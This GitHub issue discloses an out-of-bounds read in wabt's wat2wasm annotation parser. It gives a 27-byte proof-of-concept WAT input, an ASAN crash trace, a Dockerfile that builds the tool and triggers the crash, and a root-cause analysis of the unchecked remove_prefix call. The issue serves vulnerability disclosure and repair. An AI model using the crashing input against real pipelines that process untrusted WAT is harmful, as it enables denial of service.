Skip to content

heap OOB read / SEGV in BinaryWriter::WriteExpr #2742

@DavidKorczynski

Description

@DavidKorczynski

Description of the vulnerability and its impact

When wat2wasm processes a WAT file containing a @custom annotation inside a function
body (e.g. @custom "a"), ParseCodeMetadataAnnotation calls name.remove_prefix(14)
on the token text "custom" (6 bytes) without first checking that the name starts with
"metadata.code.". This violates the C++ precondition for std::string_view::remove_prefix,
producing a corrupted string_view with a pointer advanced 14 bytes past the token
allocation and a length of 0xFFFFFFFFFFFFFFF8 (unsigned wraparound). The corrupted
view is stored in a CodeMetadataExpr node and later used as a key in
std::unordered_map<std::string_view, CodeMetadataSection> inside BinaryWriter::WriteExpr,
causing the hash function to attempt a read of ~18 exabytes from an invalid address.

Impact: Deterministic crash (DoS) of any pipeline running wat2wasm --enable-annotations
on untrusted input. The corrupted pointer is heap-relative, creating a theoretical (but
non-trivial) memory disclosure primitive.

First faulty condition: src/wast-parser.cc:2314name.remove_prefix(sizeof("metadata.code.") - 1) called without a prior starts_with("metadata.code.") guard.

Crash site: src/binary-writer.cc:1189BinaryWriter::WriteExpr hashes the corrupted string_view.


How to reproduce

echo '(module(func(@custom "a")))' > poc.wat
wat2wasm --enable-annotations poc.wat -o /dev/null

Crashes deterministically on current HEAD. No special heap layout or environment required.

ASAN output:

==10==ERROR: AddressSanitizer: SEGV on unknown address 0x603000010000
==10==The signal is caused by a READ memory access.
    #0 in std::_Hash_bytes(void const*, unsigned long, unsigned long)
    #1 in std::hash<std::string_view>::operator()
    #2 in std::unordered_map<std::string_view, ...>::operator[]
    #3 in wabt::(anonymous namespace)::BinaryWriter::WriteExpr
           /build/repo/src/binary-writer.cc:1189
    #4 in BinaryWriter::WriteExprList /build/repo/src/binary-writer.cc:1203
    #5 in BinaryWriter::WriteFunc    /build/repo/src/binary-writer.cc:1229
    #6 in BinaryWriter::WriteModule  /build/repo/src/binary-writer.cc:1737
    #7 in wabt::WriteBinaryModule    /build/repo/src/binary-writer.cc:1947
    #8 in ProgramMain                /build/repo/src/tools/wat2wasm.cc:152

For a full end-to-end reproducer this Dockerfile reproduces the issue:

FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive
ENV TZ=UTC

RUN apt-get update && apt-get install -y --no-install-recommends \
    git \
    cmake \
    ninja-build \
    clang-18 \
    llvm-18 \
    libclang-rt-18-dev \
    python3 \
    ca-certificates \
    && rm -rf /var/lib/apt/lists/*

# Clone wabt at HEAD (unpatched as of April 2026)
RUN git clone --depth=1 --recurse-submodules https://github.com/WebAssembly/wabt.git /build/repo \
    && cd /build/repo && git log -1 --oneline

# Build wat2wasm with ASAN using clang-18
RUN mkdir -p /build/repo/build && \
    cmake -S /build/repo -B /build/repo/build \
        -GNinja \
        -DCMAKE_BUILD_TYPE=Debug \
        -DCMAKE_C_COMPILER=clang-18 \
        -DCMAKE_CXX_COMPILER=clang++-18 \
        "-DCMAKE_C_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_CXX_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_EXE_LINKER_FLAGS=-fsanitize=address" \
        -DBUILD_TESTS=OFF \
    && ninja -C /build/repo/build wat2wasm

# Embed the PoC: 27-byte WAT text that triggers the bug
RUN echo '(module(func(@custom "a")))' > /build/poc.wat

# Show the vulnerable source region and then trigger the ASAN crash
CMD ["/bin/sh", "-c", \
    "echo '=== Vulnerable source (src/wast-parser.cc — ParseCodeMetadataAnnotation) ===' && \
     grep -n 'remove_prefix' /build/repo/src/wast-parser.cc | head -5 && \
     echo '' && \
     echo '=== ASAN crash ===' && \
     ASAN_OPTIONS='detect_leaks=0:print_stacktrace=1' \
     ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer-18) \
       /build/repo/build/wat2wasm --enable-annotations /build/poc.wat -o /dev/null 2>&1; exit 1"]

Which WABT tools or library functions are affected

  • Tool: wat2wasm
  • Vulnerable function: WastParser::ParseCodeMetadataAnnotationsrc/wast-parser.cc:2314
  • Crash site: BinaryWriter::WriteExprsrc/binary-writer.cc:1189

Which WebAssembly features must be enabled

--enable-annotations — the crash is only reachable when annotation parsing is
enabled. The @custom token is only accepted under this flag.


Root Cause Analysis

Background

wabt's wat2wasm tool compiles WebAssembly Text Format (WAT) to binary. The --enable-annotations flag activates support for WAT annotations — syntactic extensions of the form (@name ...). One annotation type is metadata.code.*, used to attach custom metadata to instructions for toolchain pipelines. The annotation name must begin with the 14-byte prefix "metadata.code." for this feature to work correctly.

Vulnerable Code

// src/wast-parser.cc:2310 — WastParser::ParseCodeMetadataAnnotation
Result WastParser::ParseCodeMetadataAnnotation(ExprList* exprs) {
  WABT_TRACE(ParseCodeMetadataAnnotation);
  Token tk = Consume();
  std::string_view name = tk.text();
  name.remove_prefix(sizeof("metadata.code.") - 1);  // line 2314 — BUG
  std::string data_text;
  CHECK_RESULT(ParseQuotedText(&data_text, false));
  std::vector<uint8_t> data(data_text.begin(), data_text.end());
  exprs->push_back(std::make_unique<CodeMetadataExpr>(name, std::move(data)));
  EXPECT(Rpar);
  return Result::Ok;
}

Plain explanation: The function assumes that any annotation token reaching it begins with the 14-byte prefix "metadata.code." and strips that prefix unconditionally. When the token is "custom" (6 bytes), stripping 14 bytes is undefined behavior — it produces a string_view pointing past the end of the token buffer with a wrapped, near-maximal length.

Precise explanation: sizeof("metadata.code.") - 1 is 14. Calling remove_prefix(14) on a string_view of size 6 advances the internal data_ pointer by 14 bytes (into adjacent heap memory or lexer state) and sets size_ to 6 - 14 = -8, which as size_t is 0xFFFFFFFFFFFFFFF8. The resulting string_view is stored — without copying — into CodeMetadataExpr::name (a std::string_view member). At binary write time, BinaryWriter::WriteExpr uses this as a key in std::unordered_map<std::string_view, CodeMetadataSection>, which hashes the string_view by calling std::_Hash_impl::hash(data_ptr, 0xFFFFFFFFFFFFFFF8) — a read of ~18 exabytes from an invalid address, immediately caught by ASAN as a SEGV.

The root cause is the absence of a guard in ParseCodeMetadataAnnotation verifying that the annotation name actually starts with "metadata.code." before calling remove_prefix. A corresponding guard exists at module level (in the lexer's annotation token accumulation), but not in the expression-level dispatcher.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions